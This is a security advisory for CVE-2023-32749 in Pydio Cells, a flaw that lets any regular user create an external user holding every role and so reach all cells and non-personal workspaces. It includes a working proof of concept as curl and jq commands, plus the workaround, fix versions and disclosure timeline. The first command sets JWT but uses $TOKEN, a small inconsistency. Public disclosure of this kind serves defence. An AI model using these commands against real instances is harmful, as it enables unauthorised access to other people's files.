Pydio Cells 4.1.2 Privilege Escalation

Advisory: Pydio Cells: Unauthorised Role AssignmentsPydio Cells allows users by default to create so-called external usersin order to share files with them. By modifying the HTTP request sentwhen creating such an external user, it is possible to assign the newuser arbitrary roles. By assigning all roles to a newly created user, access toall cells and non-personal workspaces is granted.Details=======Product: Pydio CellsAffected Versions: 4.1.2 and earlier versionsFixed Versions: 4.2.0, 4.1.3, 3.0.12Vulnerability Type: Privilege EscalationSecurity Risk: highVendor URL: https://pydio.com/Vendor Status: notifiedAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-003Advisory Status: publishedCVE: CVE-2023-32749CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32749Introduction============"Pydio Cells is an open-core, self-hosted Document Sharing andCollaboration platform (DSC) specifically designed for organizationsthat need advanced document sharing and collaboration without securitytrade-offs or compliance issues."(from the vendor's homepage)More Details============Users can share cells or folders with other users on the same Pydioinstance. The web application allows to either select an alreadyexisting user from a list or to create a new user by entering a newusername and password, if this functionality is enabled. When creating anew user in this way, a HTTP PUT request like the following is sent:------------------------------------------------------------------------PUT /a/user/newuser HTTP/2Host: example.comUser-Agent: agentAuthorization: Bearer O48gvjD[...]Content-Type: application/jsonContent-Length: 628Cookie: token=AO[...]{  "Attributes": {    "profile": "shared",    "parameter:core.conf:lang": "\"en-us\"",    "send_email": "false"  },  "Roles": [],  "Login": "newuser",  "Password": "secret!",  "GroupPath": "/",  "Policies": [...]}------------------------------------------------------------------------The JSON object sent in the body contains the username and passwordfor the user to be created and an empty list for the key "Roles". Theresponse contains a JSON object similar to the following:------------------------------------------------------------------------{  "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",  "GroupPath": "/",  "Attributes": {    "parameter:core.conf:lang": "\"en-us\"",    "profile": "shared"  },  "Roles": [    {      "Uuid": "EXTERNAL_USERS",      "Label": "External Users",      "Policies": [...]    },    {      "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",      "Label": "User newuser",      "UserRole": true,      "Policies": [...]    }  ],  "Login": "newuser",  "Policies": [....],  "PoliciesContextEditable": true}------------------------------------------------------------------------The key "Roles" now contains a list with two objects, which seem to beapplied by default. The roles list in the HTTP request can bemodified to contain a list of all available UUIDs for roles, which canbe obtained by using the user search functionality. This results in anew user account with all roles applied. By performing a login as thenewly created user, access to all cells and non-personal workspaces ofthe whole Pydio instance is granted.Proof of Concept================Login to the Pydio Cells web interface with a regular user and retrievethe JWT from the HTTP requests. This can either be done using an HTTPattack proxy or using the browser's developer tools. Subsequently, curl [1]can be used as follows to retrieve a list of all users and their roles:------------------------------------------------------------------------$ export JWT="<insert JWT here>"$ curl --silent \--header "Authorization: Bearer $TOKEN" \--header 'Content-Type: application/json' \--data '{}' \https://example.com/a/user | tee all_users.json{"Users":[...]}------------------------------------------------------------------------Afterwards, jq [2] can be used to create a JSON document which can besent to the Pydio REST-API in order to create the external user "foobar"with the password "hunter2" and all roles assigned:------------------------------------------------------------------------$ jq '.Users[].Roles' all_users.json \| jq -s 'flatten | .[].Uuid | {Uuid: .}' \| jq -s 'unique' \| jq '{"Login": "foobar", "Password": "hunter2", "Attributes":{"profile": "shared"}, "Roles": .}' \| tee create_user.json{  "Login": "foobar",  "Password": "hunter2",  "Attributes": {    "profile": "shared"  },  "Roles": [...]}------------------------------------------------------------------------Finally, the following curl command can be issued to create the new externaluser:------------------------------------------------------------------------$ curl --request PUT \--silent \--header "Authorization: Bearer $JWT" \--header 'Content-Type: application/json' \--data @create_user.json \https://example.com/a/user/foobar------------------------------------------------------------------------Now, login with the newly created user to access all cells andnon-personal workspaces.Workaround==========Disallow the creation of external users in the authentication settings.Fix===Upgrade Pydio Cells to a version without the vulnerability.Security Risk=============Attackers with access to any regular user account for a Pydio Cells instance canextend their privileges by creating a new external user with all rolesassigned. Subsequently, they can access all folders and files in anycell and workspace, except for personal workspaces. The creation ofexternal users is activated by default. Therefore, the vulnerability isestimated to pose a high risk.Timeline========2023-03-23 Vulnerability identified2023-05-02 Customer approved disclosure to vendor2023-05-02 Vendor notified2023-05-03 CVE ID requested2023-05-08 Vendor released fixed version2023-05-14 CVE ID assigned2023-05-16 Vendor asks for a few more days before the advisory is released2023-05-30 Advisory releasedReferences==========[1] https://curl.se/[2] https://stedolan.github.io/jq/RedTeam Pentesting GmbH=======================RedTeam Pentesting offers individual penetration tests performed by ateam of specialised IT-security experts. Hereby, security weaknesses incompany networks or products are uncovered and can be fixed immediately.As there are only few experts in this field, RedTeam Pentesting wants toshare its knowledge and enhance the public knowledge with research insecurity-related areas. The results are made available as publicsecurity advisories.More information about RedTeam Pentesting can be found at:https://www.redteam-pentesting.de/Working at RedTeam Pentesting=============================RedTeam Pentesting is looking for penetration testers to join our teamin Aachen, Germany. If you are interested please visit:https://jobs.redteam-pentesting.de/-- RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0Alter Posthof 1                           Fax : +49 241 510081-9952062 Aachen                    https://www.redteam-pentesting.deGermany                         Registergericht: Aachen HRB 14004Geschäftsführer:                       Patrick Hof, Jens Liebchen